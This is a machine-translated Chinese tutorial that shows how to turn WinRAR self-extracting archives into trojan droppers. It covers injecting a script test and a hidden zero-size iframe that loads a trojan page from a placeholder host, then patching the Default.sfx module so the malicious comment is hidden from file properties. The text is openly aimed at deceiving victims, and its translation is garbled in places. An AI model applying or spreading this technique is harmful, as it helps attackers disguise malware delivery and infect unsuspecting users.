Analysis of new security risks associated with WinRAR and Trojan

Source: Zhongguancun Online author: Zhang Qi

Compressed files are one of the most common types of files. They can be seen everywhere, whether they are normal software programs or compress package Trojans. Of course, we will try our best to spread this kind of most common file for us. However, the method of carrying Trojans in common compressed packages is somewhat outdated. Today we will focus on analyzing a new idea of spreading Trojans in WinRAR compressed packages!

I. Advantages of WinRAR in combination with Trojans

We all know that the WinRAR software can create an EXE self-decompressed file to help users who do not have the WinRAR software installed. Self-extracting files created by WinRAR are very common, and many software have begun to use them to create installation programs. When using WinRAR to create a self-decompressed file, you can also customize and beautify the self-decompressed interface to display any files or images during self-decompressed. We can redefine the WinRAR self-extracting file interface to cheat the other party to execute webpage Trojan before decompression.

Ii. Simple Test

First, we need to create a WinRAR self-extracting file. You can package and compress any resource, such as several images or music, into the RAR format. Use WinRAR to open the compressed package, and click the "self-extract" button on the WinRAR toolbar to open the self-extract file creation dialog box. Select the "Deault. sfx" module in the "self-extracting module" and click the "Advanced Self-extracting options" button to open the "Advanced Self-extracting options" dialog box. Select the "text and icon" tab. In the "text displayed in the" self-extracting file window "area below, any text that can be input will be displayed in the Self-extracting interface. If we enter the webpage code, will the code be executed?

In the text input area, enter the following code:

<Script> alert (nethack) </script>

This code is often used to detect cross-site vulnerabilities. If a vulnerability exists, a text prompt dialog box is displayed on the webpage. . Now, double-click the self-extracting file to check whether the previous cross-site detection code is executed? After the self-extracting file is opened, a text prompt dialog box is displayed, indicating that the webpage code is executed.

It can be seen that the WinRAR self-extracting file interface has a cross-site Trojan vulnerability. We can modify the test code just now to display any webpage when the self-extracting file is opened, of course, Trojan pages can also be displayed, so as to use WinRAR to decompress files and mount webpage Trojans!
3. Self-extract and mount webpage Trojans
Now, we are going to create a WinRAR self-extracting file with an attack on trojans. First, prepare a webpage Trojan and upload it to a website space. Assume that the webpage Trojan URL is http://www.xxx.com/01.htm ". Create a self-decompressed file in the same way as the preceding one. But in the text box, enter the following code:

<Iframe width = 0 height = 0 src ="Http://www.XXX.com/01.htm> </iframe>

This Code indicates that a webpage with a length and width of 0 pixels is displayed, that is, an invisible page frame. The webpage content displayed is the specified Trojan page. After confirming, you can create a WinRAR self-extracting file for the trojan attack. But here we change the trojan statement:

<Iframe width = 800 height = 800 src ="Http://www.baidu.com> </iframe>

Display a page frame with a length of 300 and the displayed webpage content is the Baidu homepage. Double-click to open the WinRAR self-extracting file that we added with the trojan code. The Baidu webpage is displayed in the Self-extracting window. It can be seen that the mounting is successful! As long as you replace the Code with the actual Trojan code, a blank page will be displayed on the WinRAR self-extracting interface, and a hidden Trojan page will be opened without detecting any attack symptoms!
　　
Iv. Trojan-mounted self-decompressed packages

Although the WinRAR self-extracting Trojan made using the above method does not have any symptoms during the attack, it is still defective. First, use the code to hide Trojans. Although Trojan pages are not displayed, the page is blank and the default prompt information is not displayed. In addition, all self-decompressed files with scripts are added with the "Comments" tab in their "attributes", even for self-decompressed files without attack. Right-click the self-decompressed file you just created and select the "properties" command in the pop-up menu to open the Properties dialog box. Select the "comment" option page. In this way, the trojan code set when the compressed file is created in the Self-extracting format is exposed.

5. Stronger Trojan Protection

So how can we make the hidden annotation information more perfect for the Self-decompressed package file of the Trojan attack? In fact, the "comment" information of the Self-extracting file comes from the "Deault. sfx" self-extracting module in WinRAR. We can completely modify this module so that the self-extracting file does not display the "comment" information.

In the WinRAR installation directory, find the module File "Deault. sfx ". Before modification, you can use Peid to check the Shell and find that the file has an UPX Shell, and you can simply Shell it with UPX Shell.

Download and install the "exists resource modifier" and use exists to open the "Deault. sfx" file. Expand "resource"> "string table"> "l0"> "Chinese (China)" in the list on the left of the exists )", the string between 150 and 155 displayed in the list on the right is the text code displayed in the Self-extracting window of the default self-extracting file. Each line of String Length cannot exceed 250 English characters. We can modify it to hide the Trojan horse. Add the following Trojan code at the end of the code line 155:

<Iframe width = 800 height = 800 src ="Http://www.baidu.com> </iframe>

After the modification is complete, close exists and save the updated "Deault. sfx" file. Then, you can directly create a WinRAR self-extracting file without adding the trojan code. The Trojan page (11) is automatically displayed in the Self-extracting and self-extracting files ). However, the "comment" option page is invisible to the file attributes, so that the "comment" information is hidden. If the length and width of the Hanging Horse frame are 0, the self-extracting interface displays "click the Install button to start decompression ......" And other default information.

In this way, an extremely perfect WinRAR self-extracting Trojan is successfully created! Can you find out how different it is from a common self-extracting file?